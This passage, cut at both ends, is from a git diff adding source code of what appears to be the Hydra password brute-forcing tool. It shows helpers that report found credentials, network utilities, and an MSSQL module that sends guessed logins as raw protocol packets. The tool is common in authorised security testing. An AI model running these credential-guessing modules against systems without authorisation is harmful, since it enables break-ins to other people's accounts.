\e[32m%s\e[0m password: \e[32m%s\e[0m\n", port, svc, hydra_get_next_login(), hydra_get_next_password()); + else + fprintf(fp, "[%d][%s] login: %s password: %s\n", port, svc, hydra_get_next_login(), hydra_get_next_password()); + + if (stdout != fp) { + if (!strcmp(svc, "rsh")) + printf("[%d][%s] login: %s\n", port, svc, hydra_get_next_login()); + else + printf("[%d][%s] login: %s password: %s\n", port, svc, hydra_get_next_login(), hydra_get_next_password()); + } + + fflush(fp); +} + +/* needed for irc module to display the general server password */ +void hydra_report_pass_found(int port, char *ip, char *svc, FILE * fp) { + strcpy(ipaddr_str, hydra_address2string(ip)); + if (colored_output) + fprintf(fp, "[\e[31m%d\e[0m][\e[31m%s\e[0m] host: \e[32m%s\e[0m password: \e[32m%s\e[0m\n", port, svc, ipaddr_str, hydra_get_next_password()); + else + fprintf(fp, "[%d][%s] host: %s password: %s\n", port, svc, ipaddr_str, hydra_get_next_password()); + if (stdout != fp) + printf("[%d][%s] host: %s password: %s\n", port, svc, ipaddr_str, hydra_get_next_password()); + fflush(fp); +} + +void hydra_report_found_host(int port, char *ip, char *svc, FILE * fp) { + char *keyw = "password"; + + strcpy(ipaddr_str, hydra_address2string(ip)); + if (!strcmp(svc, "smtp-enum")) + keyw = "domain"; + if (!strcmp(svc, "rsh") || !strcmp(svc, "oracle-sid")) + if (colored_output) + fprintf(fp, "[\e[31m%d\e[0m][\e[31m%s\e[0m] host: \e[32m%s\e[0m login: \e[32m%s\e[0m\n", port, svc, ipaddr_str, hydra_get_next_login()); + else + fprintf(fp, "[%d][%s] host: %s login: %s\n", port, svc, ipaddr_str, hydra_get_next_login()); + else if (!strcmp(svc, "snmp3")) + if (colored_output) + fprintf(fp, "[\e[31m%d\e[0m][\e[31m%s\e[0m] host: \e[32m%s\e[0m login: \e[32m%s\e[0m\n", port, svc, ipaddr_str, hydra_get_next_password()); + else + fprintf(fp, "[%d][%s] host: %s login: %s\n", port, svc, ipaddr_str, hydra_get_next_password()); + else if (!strcmp(svc, "cisco-enable") || !strcmp(svc, "cisco")) + if (colored_output) + fprintf(fp, "[\e[31m%d\e[0m][\e[31m%s\e[0m] host: \e[32m%s\e[0m password: \e[32m%s\e[0m\n", port, svc, ipaddr_str, hydra_get_next_password()); + else + fprintf(fp, "[%d][%s] host: %s password: %s\n", port, svc, ipaddr_str, hydra_get_next_password()); + else if (colored_output) + fprintf(fp, "[\e[31m%d\e[0m][\e[31m%s\e[0m] host: \e[32m%s\e[0m login: \e[32m%s\e[0m %s: \e[32m%s\e[0m\n", port, svc, ipaddr_str, hydra_get_next_login(), keyw, + hydra_get_next_password()); + else + fprintf(fp, "[%d][%s] host: %s login: %s %s: %s\n", port, svc, ipaddr_str, hydra_get_next_login(), keyw, hydra_get_next_password()); + if (stdout != fp) { + if (!strcmp(svc, "rsh") || !strcmp(svc, "oracle-sid")) + printf("[%d][%s] host: %s login: %s\n", port, svc, ipaddr_str, hydra_get_next_login()); + else if (!strcmp(svc, "snmp3")) + printf("[%d][%s] host: %s login: %s\n", port, svc, ipaddr_str, hydra_get_next_password()); + else if (!strcmp(svc, "cisco-enable") || !strcmp(svc, "cisco")) + printf("[%d][%s] host: %s password: %s\n", port, svc, ipaddr_str, hydra_get_next_password()); + else + printf("[%d][%s] host: %s login: %s %s: %s\n", port, svc, ipaddr_str, hydra_get_next_login(), keyw, hydra_get_next_password()); + } + fflush(fp); + fflush(stdout); +} + +void hydra_report_found_host_msg(int port, char *ip, char *svc, FILE * fp, char *msg) { + strcpy(ipaddr_str, hydra_address2string(ip)); + if (colored_output) + fprintf(fp, "[\e[31m%d\e[0m][\e[31m%s\e[0m] host: \e[32m%s\e[0m login: \e[32m%s\e[0m password: \e[32m%s\e[0m [%s]\n", port, svc, ipaddr_str, hydra_get_next_login(), + hydra_get_next_password(), msg); + else + fprintf(fp, "[%d][%s] host: %s login: %s password: %s [%s]\n", port, svc, ipaddr_str, hydra_get_next_login(), hydra_get_next_password(), msg); + if (stdout != fp) + printf("[%d][%s] host: %s login: %s password: %s\n", port, svc, ipaddr_str, hydra_get_next_login(), hydra_get_next_password()); + fflush(fp); +} + +int hydra_connect_to_ssl(int socket) { +#ifdef LIBOPENSSL + return (internal__hydra_connect_to_ssl(socket)); +#else + return -1; +#endif +} + +int hydra_connect_ssl(char *host, int port) { + if (__first_connect != 0) + __first_connect = 0; + else + sleep(conwait); +#ifdef LIBOPENSSL + return (internal__hydra_connect_ssl(host, port, SOCK_STREAM, 6)); +#else + return (internal__hydra_connect(host, port, SOCK_STREAM, 6)); +#endif +} + +int hydra_connect_tcp(char *host, int port) { + if (__first_connect != 0) + __first_connect = 0; + else + sleep(conwait); + return (internal__hydra_connect(host, port, SOCK_STREAM, 6)); +} + +int hydra_connect_udp(char *host, int port) { + if (__first_connect != 0) + __first_connect = 0; + else + sleep(conwait); + return (internal__hydra_connect(host, port, SOCK_DGRAM, 17)); +} + +int hydra_disconnect(int socket) { +#ifdef LIBOPENSSL + if (use_ssl && SSL_get_fd(ssl) == socket) { + /* SSL_shutdown(ssl); ...skip this--it slows things down */ + SSL_set_bio(ssl, NULL, NULL); + SSL_clear(ssl); + use_ssl = 0; + } +#endif + close(socket); + if (debug) + printf("DEBUG_DISCONNECT\n"); + return -1; +} + +int hydra_data_ready_writing_timed(int socket, long sec, long usec) { + fd_set fds; + + FD_ZERO(&fds); + FD_SET(socket, &fds); + return (my_select(socket + 1, &fds, NULL, NULL, sec, usec)); +} + +int hydra_data_ready_writing(int socket) { + return (hydra_data_ready_writing_timed(socket, 30, 0)); +} + +int hydra_data_ready_timed(int socket, long sec, long usec) { + fd_set fds; + + FD_ZERO(&fds); + FD_SET(socket, &fds); + return (my_select(socket + 1, &fds, NULL, NULL, sec, usec)); +} + +int hydra_data_ready(int socket) { + return (hydra_data_ready_timed(socket, 0, 100)); +} + +int hydra_recv(int socket, char *buf, int length) { + int ret; + char text[64]; + + ret = internal__hydra_recv(socket, buf, length); + if (debug) { + sprintf(text, "[DEBUG] RECV [pid:%d]", getpid()); + hydra_dump_data(buf, ret, text); + //hydra_report_debug(stderr, "DEBUG_RECV_BEGIN|%s|END [pid:%d ret:%d]", buf, getpid(), ret); + } + return ret; +} + +int hydra_recv_nb(int socket, char *buf, int length) { + int ret = -1; + char text[64]; + + if (hydra_data_ready_timed(socket, (long) waittime, 0) > 0) { + if ((ret = internal__hydra_recv(socket, buf, length)) <= 0) { + buf[0] = 0; + if (debug) { + sprintf(text, "[DEBUG] RECV [pid:%d]", getpid()); + hydra_dump_data(buf, ret, text); + } + return ret; + } + if (debug) { + sprintf(text, "[DEBUG] RECV [pid:%d]", getpid()); + hydra_dump_data(buf, ret, text); + //hydra_report_debug(stderr, "DEBUG_RECV_BEGIN|%s|END [pid:%d ret:%d]", buf, getpid(), ret); + } + } + return ret; +} + +char *hydra_receive_line(int socket) { + char buf[1024], *buff, *buff2, text[64]; + int i, j = 1, k, got = 0; + + if ((buff = malloc(sizeof(buf))) == NULL) { + fprintf(stderr, "[ERROR] could not malloc\n"); + return NULL; + } + memset(buff, 0, sizeof(buf)); + if (debug) + printf("[DEBUG] hydra_receive_line: waittime: %d, conwait: %d, socket: %d, pid: %d\n", waittime, conwait, socket, getpid()); + + if ((i = hydra_data_ready_timed(socket, (long) waittime, 0)) > 0) { + if ((got = internal__hydra_recv(socket, buff, sizeof(buf) - 1)) < 0) { + free(buff); + return NULL; + } + } else { + if (debug) + printf("[DEBUG] hydra_data_ready_timed: %d, waittime: %d, conwait: %d, socket: %d\n", i, waittime, conwait, socket); + i = 0; + } + + if (got < 0) { + if (debug) { + sprintf(text, "[DEBUG] RECV [pid:%d]", getpid()); + hydra_dump_data("", -1, text); + //hydra_report_debug(stderr, "DEBUG_RECV_BEGIN||END [pid:%d %d]", getpid(), i); + perror("recv"); + } + free(buff); + return NULL; + } else { + if (got > 0) { + for (k = 0; k < got; k++) + if (buff[k] == 0) + buff[k] = 32; + buff[got] = 0; + usleep(100); + } + } + + while (hydra_data_ready(socket) > 0 && j > 0) { + j = internal__hydra_recv(socket, buf, sizeof(buf) - 1); + if (j > 0) { + for (k = 0; k < j; k++) + if (buf[k] == 0) + buf[k] = 32; + buf[j] = 0; + if ((buff2 = realloc(buff, got + j + 1)) == NULL) { + free(buff); + return NULL; + } else + buff = buff2; + memcpy(buff + got, &buf, j + 1); + got += j; + buff[got] = 0; + } + usleep(100); + } + + if (debug) { + sprintf(text, "[DEBUG] RECV [pid:%d]", getpid()); + hydra_dump_data(buff, got, text); + //hydra_report_debug(stderr, "DEBUG_RECV_BEGIN [pid:%d len:%d]|%s|END", getpid(), got, buff); + } + if (got == 0) { + free(buff); + return NULL; + } + return buff; +} + +int hydra_send(int socket, char *buf, int size, int options) { + char text[64]; + + if (debug) { + sprintf(text, "[DEBUG] SEND [pid:%d]", getpid()); + hydra_dump_data(buf, size, text); + +/* int k; + char *debugbuf = malloc(size + 1); + + if (debugbuf != NULL) { + for (k = 0; k < size; k++) + if (buf[k] == 0) + debugbuf[k] = 32; + else + debugbuf[k] = buf[k]; + debugbuf[size] = 0; + hydra_report_debug(stderr, "DEBUG_SEND_BEGIN|%s|END [pid:%d]", debugbuf, getpid()); + free(debugbuf); + }*/ + } + +/* if (hydra_data_ready_writing(socket)) < 1) return -1; XXX maybe needed in the future */ + return (internal__hydra_send(socket, buf, size, options)); +} + +int make_to_lower(char *buf) { + if (buf == NULL) + return 1; + while (buf[0] != 0) { + buf[0] = tolower((int) buf[0]); + buf++; + } + return 1; +} + +char *hydra_strrep(char *string, char *oldpiece, char *newpiece) { + int str_index, newstr_index, oldpiece_index, end, new_len, old_len, cpy_len; + char *c, oldstring[1024]; + static char newstring[1024]; + + if (string == NULL || oldpiece == NULL || newpiece == NULL || strlen(string) >= sizeof(oldstring) - 1 + || (strlen(string) + strlen(newpiece) - strlen(oldpiece) >= sizeof(newstring) - 1 && strlen(string) > strlen(oldpiece))) + return NULL; + + strcpy(newstring, string); + strcpy(oldstring, string); + + // while ((c = (char *) strstr(oldstring, oldpiece)) != NULL) { + c = (char *) strstr(oldstring, oldpiece); + new_len = strlen(newpiece); + old_len = strlen(oldpiece); + end = strlen(oldstring) - old_len; + oldpiece_index = c - oldstring; + newstr_index = 0; + str_index = 0; + while (c != NULL && str_index <= end) { + /* Copy characters from the left of matched pattern occurence */ + cpy_len = oldpiece_index - str_index; + strncpy(newstring + newstr_index, oldstring + str_index, cpy_len); + newstr_index += cpy_len; + str_index += cpy_len; + + /* Copy replacement characters instead of matched pattern */ + strcpy(newstring + newstr_index, newpiece); + newstr_index += new_len; + str_index += old_len; + /* Check for another pattern match */ + if ((c = (char *) strstr(oldstring + str_index, oldpiece)) != NULL) + oldpiece_index = c - oldstring; + } + /* Copy remaining characters from the right of last matched pattern */ + strcpy(newstring + newstr_index, oldstring + str_index); + strcpy(oldstring, newstring); +// } + return newstring; +} + +unsigned char hydra_conv64(unsigned char in) { + if (in < 26) + return (in + 'A'); + else if (in >= 26 && in < 52) + return (in + 'a' - 26); + else if (in >= 52 && in < 62) + return (in + '0' - 52); + else if (in == 62) + return '+'; + else if (in == 63) + return '/'; + else { + fprintf(stderr, "[ERROR] too high for base64: %d\n", in); + return 0; + } +} + +void hydra_tobase64(unsigned char *buf, int buflen, int bufsize) { + unsigned char small[3] = { 0, 0, 0 }; + unsigned char big[5]; + unsigned char *ptr = buf; + int i = bufsize; + unsigned int len = 0; + unsigned char bof[i]; + + if (buf == NULL || strlen((char *) buf) == 0) + return; + bof[0] = 0; + memset(big, 0, sizeof(big)); + memset(bof, 0, bufsize); + + for (i = 0; i < buflen / 3; i++) { + memset(big, 0, sizeof(big)); + big[0] = hydra_conv64(*ptr >> 2); + big[1] = hydra_conv64(((*ptr & 3) << 4) + (*(ptr + 1) >> 4)); + big[2] = hydra_conv64(((*(ptr + 1) & 15) << 2) + (*(ptr + 2) >> 6)); + big[3] = hydra_conv64(*(ptr + 2) & 63); + len += strlen((char *) big); + if (len > bufsize) { + buf[0] = 0; + return; + } + strcat((char *) bof, (char *) big); + ptr += 3; + } + + if (*ptr != 0) { + small[0] = *ptr; + if (*(ptr + 1) != 0) + small[1] = *(ptr + 1); + else + small[1] = 0; + ptr = small; + big[0] = hydra_conv64(*ptr >> 2); + big[1] = hydra_conv64(((*ptr & 3) << 4) + (*(ptr + 1) >> 4)); + big[2] = hydra_conv64(((*(ptr + 1) & 15) << 2) + (*(ptr + 2) >> 6)); + big[3] = hydra_conv64(*(ptr + 2) & 63); + if (small[1] == 0) + big[2] = '='; + big[3] = '='; + strcat((char *) bof, (char *) big); + } + + strcpy((char *) buf, (char *) bof); /* can not overflow */ +} + +void hydra_dump_asciihex(unsigned char *string, int length) { + unsigned char *p = (unsigned char *) string; + unsigned char lastrow_data[16]; + int rows = length / HYDRA_DUMP_ROWS; + int lastrow = length % HYDRA_DUMP_ROWS; + int i, j; + + for (i = 0; i < rows; i++) { + printf("%04hx: ", i * 16); + for (j = 0; j < HYDRA_DUMP_ROWS; j++) { + printf("%02x", p[(i * 16) + j]); + if (j % 2 == 1) + printf(" "); + } + printf(" [ "); + for (j = 0; j < HYDRA_DUMP_ROWS; j++) { + if (isprint(p[(i * 16) + j])) + printf("%c", p[(i * 16) + j]); + else + printf("."); + } + printf(" ]\n"); + } + if (lastrow > 0) { + memset(lastrow_data, 0, sizeof(lastrow_data)); + memcpy(lastrow_data, p + length - lastrow, lastrow); + printf("%04hx: ", i * 16); + for (j = 0; j < lastrow; j++) { + printf("%02x", p[(i * 16) + j]); + if (j % 2 == 1) + printf(" "); + } + while (j < HYDRA_DUMP_ROWS) { + printf(" "); + if (j % 2 == 1) + printf(" "); + j++; + } + printf(" [ "); + for (j = 0; j < lastrow; j++) { + if (isprint(p[(i * 16) + j])) + printf("%c", p[(i * 16) + j]); + else + printf("."); + } + while (j < HYDRA_DUMP_ROWS) { + printf(" "); + j++; + } + printf(" ]\n"); + } +} + +char *hydra_address2string(char *address) { + struct sockaddr_in target; + struct sockaddr_in6 target6; + + if (address[0] == 4) { + memcpy(&target.sin_addr.s_addr, &address[1], 4); + return inet_ntoa((struct in_addr) target.sin_addr); + } else +#ifdef AF_INET6 + if (address[0] == 16) { + memcpy(&target6.sin6_addr, &address[1], 16); + inet_ntop(AF_INET6, &target6.sin6_addr, ipstring, sizeof(ipstring)); + return ipstring; + } else +#endif + { + fprintf(stderr, "[ERROR] unknown address string size!\n"); + return NULL; + } + return NULL; // not reached +} + +void hydra_set_srcport(int port) { + src_port = port; +} + +#ifdef HAVE_PCRE +int hydra_string_match(char *str, const char *regex) { + pcre *re = NULL; + int offset_error = 0; + const char *error = NULL; + int rc = 0; + + re = pcre_compile(regex, PCRE_CASELESS | PCRE_DOTALL, &error, &offset_error, NULL); + if (re == NULL) { + fprintf(stderr, "[ERROR] PCRE compilation failed at offset %d: %s\n", offset_error, error); + return 0; + } + + rc = pcre_exec(re, NULL, str, strlen(str), 0, 0, NULL, 0); + if (rc >= 0) { + return 1; + } + return 0; +} +#endif + +/* + * str_replace.c implements a str_replace PHP like function + * Copyright (C) 2009 chantra + * + * Create a new string with [substr] being replaced ONCE by [replacement] in [string] + * Returns the new string, or NULL if out of memory. + * The caller is responsible for freeing this new string. + * + */ +char *hydra_string_replace(const char *string, const char *substr, const char *replacement) { + char *tok = NULL; + char *newstr = NULL; + + tok = strstr(string, substr); + if (tok == NULL) + return strdup(string); + newstr = malloc(strlen(string) - strlen(substr) + strlen(replacement) + 1); + if (newstr == NULL) + return NULL; + memcpy(newstr, string, tok - string); + memcpy(newstr + (tok - string), replacement, strlen(replacement)); + memcpy(newstr + (tok - string) + strlen(replacement), tok + strlen(substr), strlen(string) - strlen(substr) - (tok - string)); + memset(newstr + strlen(string) - strlen(substr) + strlen(replacement), 0, 1); + return newstr; +} + +char *hydra_strcasestr(const char *haystack, const char *needle) { + if (needle == NULL || *needle == 0) + return NULL; + + for (; *haystack; ++haystack) { + if (toupper((int) *haystack) == toupper((int) *needle)) { + const char *h, *n; + + for (h = haystack, n = needle; *h && *n; ++h, ++n) { + if (toupper((int) *h) != toupper((int) *n)) { + break; + } + } + if (!*n) { /* matched all of 'needle' to null termination */ + return (char *) haystack; /* return the start of the match */ + } + } + } + return NULL; +} + +void hydra_dump_data(unsigned char *buf, int len, char *text) { + unsigned char *p = (unsigned char *) buf; + unsigned char lastrow_data[16]; + int rows = len / 16; + int lastrow = len % 16; + int i, j; + + if (text != NULL && text[0] != 0) + printf("%s (%d bytes):\n", text, len); + + if (buf == NULL || len < 1) + return; + + for (i = 0; i < rows; i++) { + printf("%04hx: ", i * 16); + for (j = 0; j < 16; j++) { + printf("%02x", p[(i * 16) + j]); + if (j % 2 == 1) + printf(" "); + } + printf(" [ "); + for (j = 0; j < 16; j++) { + if (isprint(p[(i * 16) + j])) + printf("%c", p[(i * 16) + j]); + else + printf("."); + } + printf(" ]\n"); + } + if (lastrow > 0) { + memset(lastrow_data, 0, sizeof(lastrow_data)); + memcpy(lastrow_data, p + len - lastrow, lastrow); + printf("%04hx: ", i * 16); + for (j = 0; j < lastrow; j++) { + printf("%02x", p[(i * 16) + j]); + if (j % 2 == 1) + printf(" "); + } + while (j < 16) { + printf(" "); + if (j % 2 == 1) + printf(" "); + j++; + } + printf(" [ "); + for (j = 0; j < lastrow; j++) { + if (isprint(p[(i * 16) + j])) + printf("%c", p[(i * 16) + j]); + else + printf("."); + } + while (j < 16) { + printf(" "); + j++; + } + printf(" ]\n"); + } +} + +int hydra_memsearch(char *haystack, int hlen, char *needle, int nlen) { + int i; + + for (i = 0; i <= hlen - nlen; i++) + if (memcmp(haystack + i, needle, nlen) == 0) + return i; + return -1; +} diff --git a/hydra-mod.h b/hydra-mod.h new file mode 100644 index 0000000..6494936 --- /dev/null +++ b/hydra-mod.h @@ -0,0 +1,61 @@ +#ifndef _HYDRA_MOD_H +#define _HYDRA_MOD_H + +#include "hydra.h" + +extern void hydra_child_exit(int code); +extern void hydra_register_socket(int s); +extern char *hydra_get_next_pair(); +extern char *hydra_get_next_login(); +extern char *hydra_get_next_password(); +extern void hydra_completed_pair(); +extern void hydra_completed_pair_found(); +extern void hydra_completed_pair_skip(); +extern void hydra_report_found(int port, char *svc, FILE * fp); +extern void hydra_report_pass_found(int port, char *ip, char *svc, FILE * fp); +extern void hydra_report_found_host(int port, char *ip, char *svc, FILE * fp); +extern void hydra_report_found_host_msg(int port, char *ip, char *svc, FILE * fp, char *msg); +extern void hydra_report_debug(FILE *st, char *format, ...); +extern int hydra_connect_to_ssl(int socket); +extern int hydra_connect_ssl(char *host, int port); +extern int hydra_connect_tcp(char *host, int port); +extern int hydra_connect_udp(char *host, int port); +extern int hydra_disconnect(int socket); +extern int hydra_data_ready(int socket); +extern int hydra_recv(int socket, char *buf, int length); +extern int hydra_recv_nb(int socket, char *buf, int length); +extern char *hydra_receive_line(int socket); +extern int hydra_send(int socket, char *buf, int size, int options); +extern int make_to_lower(char *buf); +extern unsigned char hydra_conv64(unsigned char in); +extern void hydra_tobase64(unsigned char *buf, int buflen, int bufsize); +extern void hydra_dump_asciihex(unsigned char *string, int length); +extern void hydra_set_srcport(int port); +extern char *hydra_address2string(char *address); +extern char *hydra_strcasestr(const char *haystack, const char *needle); +extern void hydra_dump_data(unsigned char *buf, int len, char *text); +extern int hydra_memsearch(char *haystack, int hlen, char *needle, int nlen); +extern char *hydra_strrep(char *string, char *oldpiece, char *newpiece); + +#ifdef HAVE_PCRE +int hydra_string_match(char *str, const char *regex); +#endif +char *hydra_string_replace(const char *string, const char *substr, const char *replacement); + +int debug; +int verbose; +int waittime; +int port; +int use_proxy; +int found; +char proxy_string_ip[36]; +int proxy_string_port; +char proxy_string_type[10]; +char *proxy_authentication; +char *cmdlinetarget; + +typedef int BOOL; + +#define hydra_report fprintf + +#endif diff --git a/hydra-mssql.c b/hydra-mssql.c new file mode 100644 index 0000000..7f5d226 --- /dev/null +++ b/hydra-mssql.c @@ -0,0 +1,168 @@ +#include "hydra-mod.h" + +#define MSLEN 30 + +extern char *HYDRA_EXIT; +char *buf; + +unsigned char p_hdr[] = + "\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00"; +unsigned char p_pk2[] = + "\x30\x30\x30\x30\x30\x30\x61\x30\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x20\x18\x81\xb8\x2c\x08\x03" + "\x01\x06\x0a\x09\x01\x01\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x73\x71\x75\x65\x6c\x64\x61" + "\x20\x31\x2e\x30\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00"; +unsigned char p_pk3[] = + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x04\x02\x00\x00\x4d\x53\x44" + "\x42\x4c\x49\x42\x00\x00\x00\x07\x06\x00\x00" "\x00\x00\x0d\x11\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00"; +unsigned char p_lng[] = + "\x02\x01\x00\x47\x00\x00\x02\x00\x00\x00\x00" + "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x30\x30\x30\x00\x00" "\x00\x03\x00\x00\x00"; + +int start_mssql(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[1024]; + char ms_login[MSLEN + 1]; + char ms_pass[MSLEN + 1]; + unsigned char len_login, len_pass; + int ret = -1; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + if (strlen(login) > MSLEN) + login[MSLEN - 1] = 0; + if (strlen(pass) > MSLEN) + pass[MSLEN - 1] = 0; + len_login = strlen(login); + len_pass = strlen(pass); + memset(ms_login, 0, MSLEN + 1); + memset(ms_pass, 0, MSLEN + 1); + strcpy(ms_login, login); + strcpy(ms_pass, pass); + + memset(buffer, 0, sizeof(buffer)); + memcpy(buffer, p_hdr, 39); + memcpy(buffer + 39, ms_login, MSLEN); + memcpy(buffer + MSLEN + 39, &len_login, 1); + memcpy(buffer + MSLEN + 1 + 39, ms_pass, MSLEN); + memcpy(buffer + MSLEN + 1 + 39 + MSLEN, &len_pass, 1); + memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1, p_pk2, 110); + memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110, &len_pass, 1); + memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1, ms_pass, MSLEN); + memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1 + MSLEN, p_pk3, 270); + + if (hydra_send(s, buffer, MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1 + MSLEN + 270, 0) < 0) + return 1; + if (hydra_send(s, (char *) p_lng, 71, 0) < 0) + return 1; + + memset(buffer, 0, sizeof(buffer)); + ret = hydra_recv_nb(s, buffer, sizeof(buffer)); + + if (ret <= 0) + return 3; + + if (ret > 10 && buffer[8] == '\xe3') { + hydra_report_found_host(port, ip, "mssql", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + return 1; + } + + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + + return 1; +} + +void service_mssql(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_MSSQL, mysslport = PORT_MSSQL_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = start_mssql(sock, ip, port, options, miscptr, fp); + hydra_disconnect(sock); + break; + case 2: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_mssql_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-mysql.c b/hydra-mysql.c new file mode 100644 index 0000000..09ef045 --- /dev/null +++ b/hydra-mysql.c @@ -0,0 +1,429 @@ + +/* mysql 3.2x.x to 4.x support - by mcbethh (at) u-n-f (dot) com */ + +/* david (dot) maciejak (at) gmail (dot) com for using libmysqlclient-dev, adding support for mysql version 5.x */ + +#include "hydra-mod.h" + +#ifndef HAVE_MATH_H +#include +void dummy_mysql() { + printf("\n"); +} + +void service_mysql(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + printf("\n"); +} +#else + +#include + +#define DEFAULT_DB "mysql" + +#ifndef LIBMYSQLCLIENT +#else + +#include +MYSQL *mysql = NULL; +#endif + +void hydra_hash_password(unsigned long *result, const char *password); +char *hydra_scramble(char *to, const char *message, const char *password); + +extern int internal__hydra_recv(int socket, char *buf, int length); +extern int hydra_data_ready_timed(int socket, long sec, long usec); + +extern char *HYDRA_EXIT; +char mysqlsalt[9]; + +/* modified hydra_receive_line, I've striped code which changed every 0x00 to 0x20 */ +char *hydra_mysql_receive_line(int socket) { + char buf[300], *buff, *buff2; + int i = 0, j = 0; + + buff = malloc(sizeof(buf)); + if (buff == NULL) + return NULL; + memset(buff, 0, sizeof(buf)); + + i = hydra_data_ready_timed(socket, (long) waittime, 0); + if (i > 0) { + if ((i = internal__hydra_recv(socket, buff, sizeof(buf))) < 0) { + free(buff); + return NULL; + } + } + if (i <= 0) { + if (debug) + hydra_report_debug(stderr, "DEBUG_RECV_BEGIN|%s|END\n", buff); + free(buff); + return NULL; + } + + j = 1; + while (hydra_data_ready(socket) > 0 && j > 0) { + j = internal__hydra_recv(socket, buf, sizeof(buf)); + if ((buff2 = realloc(buff, i + j)) == NULL) { + free(buff); + return NULL; + } else + buff = buff2; + memcpy(buff + i, &buf, j); + i = i + j; + } + + if (debug) + hydra_report_debug(stderr, "DEBUG_RECV_BEGIN|%s|END\n", buff); + return buff; +} + +/* check if valid mysql protocol, mysql version and read salt */ +char hydra_mysql_init(int sock) { + char *server_version, *pos, *buf; + unsigned char protocol; + + buf = hydra_mysql_receive_line(sock); + if (buf == NULL) + return 1; + + protocol = buf[4]; + if (protocol == 0xff) { + pos = &buf[6]; +// *(strchr(pos, '.')) = '\0'; + hydra_report(stderr, "[ERROR] %s\n", pos); + free(buf); + return 2; + } + if (protocol <= 10) { + free(buf); + return 2; + } + if (protocol > 10) { + fprintf(stderr, "[INFO] This is protocol version %d, only v10 is supported, not sure if it will work\n", protocol); + } + server_version = &buf[5]; + pos = buf + strlen(server_version) + 10; + memcpy(mysqlsalt, pos, 9); + + if (!strstr(server_version, "3.") && !strstr(server_version, 